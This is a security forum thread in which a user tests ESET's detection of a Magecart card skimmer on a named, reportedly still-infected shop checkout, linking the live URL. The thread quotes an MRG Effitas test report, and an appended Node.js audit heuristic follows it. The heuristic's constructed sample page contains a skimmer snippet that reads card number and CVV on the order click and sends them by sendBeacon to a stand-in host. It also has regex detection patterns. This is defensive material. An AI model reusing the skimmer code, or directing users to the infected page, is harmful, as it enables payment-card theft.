
Web Site Magecart Attacks - Kudos to Eset Again!



Posted (edited)

First a recent reference article:

Credit Card Skimmer Found on Nine Sites, Researchers Ignored

Quote

Security researchers discovered a new batch of nine websites infected with malicious JavaScript that steals payment card info from online shoppers.

Some of them were infected a second time and the script persisted, despite efforts from the researchers to contact the website owners.

The script is attributed, as per extensive analysis from RiskIQ, to MageCart Group 12, a threat actor that is changing tactics as their tricks are being published in security reports.

https://www.bleepingcomputer.com/news/security/credit-card-skimmer-found-on-nine-sites-researchers-ignored/

So I decided to test Eset on detection capability. Per the linked article, I picked one of the infected sites, the Bahimi swimwear shop, which was first infected in November 2019; the skimmer is still there today.

Attempted to order something here: https://bahimi.com/gbp/checkout/onepage/ .

Eset immediately detected the card skimmer:

Eset_Magacart.png

Edited by itman
Posted
23 minutes ago, itman said:

First a recent reference article:

Credit Card Skimmer Found on Nine Sites, Researchers Ignored

https://www.bleepingcomputer.com/news/security/credit-card-skimmer-found-on-nine-sites-researchers-ignored/

So I decided to test Eset on detection capability. Per the linked article, I picked one of the infected sites, the Bahimi swimwear shop, which was first infected in November 2019; the skimmer is still there today.

Attempted to order something here: https://bahimi.com/gbp/checkout/onepage/ .

Eset immediately detected the card skimmer:

Eset_Magacart.png

Yes, it's a JS script loaded in the website.

Posted (edited)

Also, in fairness, it should be noted that Eset might have issues with obfuscated JavaScript magecart attacks. I believe the web site I tested was not using obfuscated JavaScript. -EDIT- It appears Eset needs to sandbox browser-based JavaScripts and run them outside of the browser. As I understand it, browser scripts are not scanned by AMSI since they are run via the JavaScript .dll within the browser.

Eset failed the magecart simulator test for the most recent Malware Research Group On-line Banking Protection certification:

Quote

Simulator test results

The methodology behind these attacks was simple and similar: injecting malicious obfuscated JavaScript code into the website’s checkout pages and listening for an event, for example, when the user clicks on the “Pay” or “Place Order Now” or a similar button (event hijacking). When this event happens, the malicious code sends the credit card data to the attackers’ servers. In our test we simulated this attack. We implemented our obfuscated malicious JavaScript code based on the Newegg and British Airways cases and injected it into a test webstore which was built by us. The code behavior and the obfuscation technique are exactly the same as in the real-world examples: when the user fills out the credit card data and presses the “Place Order Now” button, the data is sent to our servers.

https://www.mrg-effitas.com/wp-content/uploads/2020/01/2019_Online_BankingQ4.pdf

Edited by itman
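As an added example (not from the thread, ESET or MRG Effitas), a small Node.js heuristic that audits a checkout page's HTML for the indicators the MRG description gives: scripts loaded from origins outside the shop's own allowlist, inline code that both reads card fields and has a way to send them out (optionally hooked to a click or submit event), and obfuscated inline code that defeats keyword matching and so is flagged for manual review. The allowlist, origins and sample HTML are all constructed.

```javascript
// Added example (not ESET's or MRG Effitas' code): a defender-side heuristic audit of
// a checkout page's HTML for Magecart-style indicators. All HTML below is constructed.
const ALLOWED_ORIGINS = ['https://shop.example', 'https://cdn.shop.example']; // assumed allowlist
// Field names a skimmer must read, primitives it can exfiltrate with, the event
// hijacking the MRG report describes, and common obfuscation tells.
const CARD_FIELD_RE = /card[_-]?number|cc[_-]?num|cvv|cvc|expir/i;
const EXFIL_RE = /\b(fetch|XMLHttpRequest|sendBeacon|WebSocket)\b|new\s+Image|\.src\s*=/i;
const HIJACK_RE = /addEventListener\s*\(\s*['"](click|submit|keyup|change)['"]/i;
const OBFUSCATION_RE = /\b(eval|atob|unescape|String\.fromCharCode)\s*\(|\\x[0-9a-f]{2}|\\u[0-9a-f]{4}/i;

function scriptOrigin(src, pageOrigin) {
  try { return new URL(src, pageOrigin).origin; } catch { return null; }
}

// Returns a list of findings; an empty list means nothing suspicious was seen.
function auditCheckoutPage(html, pageOrigin, allowed = ALLOWED_ORIGINS) {
  const findings = [];
  const scriptRe = /<script\b([^>]*)>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = scriptRe.exec(html)) !== null) {
    const [, attrs, body] = m;
    const src = /\bsrc\s*=\s*["']([^"']+)["']/i.exec(attrs);
    if (src) {
      // External script not on the first-party allowlist: where a supply-chain skimmer loads from.
      const origin = scriptOrigin(src[1], pageOrigin);
      if (!origin || !allowed.includes(origin)) findings.push({ kind: 'external-script', origin, src: src[1] });
    } else if (CARD_FIELD_RE.test(body) && EXFIL_RE.test(body)) {
      // Inline code that both reads card fields and has a way to send them out.
      findings.push({ kind: 'inline-skimmer-pattern', hijack: HIJACK_RE.test(body) });
    } else if (OBFUSCATION_RE.test(body)) {
      // Obfuscation defeats the keyword checks above, so flag the script for manual review.
      findings.push({ kind: 'inline-obfuscated' });
    }
  }
  return findings;
}

// Constructed page: one unexpected third-party script, one plain-text skimmer-like
// handler on the order button, one obfuscated blob and one benign script.
const SAMPLE_HTML = `
<script src="/static/checkout.js"></script>
<script src="https://cdn.shop.example/jquery.js"></script>
<script src="https://static.unknown-third-party.invalid/lib.js"></script>
<script>
document.getElementById('place-order').addEventListener('click', function () {
  var d = document.querySelector('#cc_number').value + '|' + document.querySelector('#cvv').value;
  navigator.sendBeacon('https://exfil.invalid/c', d);
});
</script>
<script>eval(atob('Y29uc29sZS5sb2coJ2hpJyk='));</script>
<script>console.log('analytics init');</script>`;
```

Keyword heuristics are exactly what obfuscation is meant to beat, which is why the obfuscation finding exists as a catch-all rather than a verdict. A Content-Security-Policy with a tight connect-src allowlist on the checkout page complements this, since a script that slips past any scanner still cannot post card data to an unlisted host.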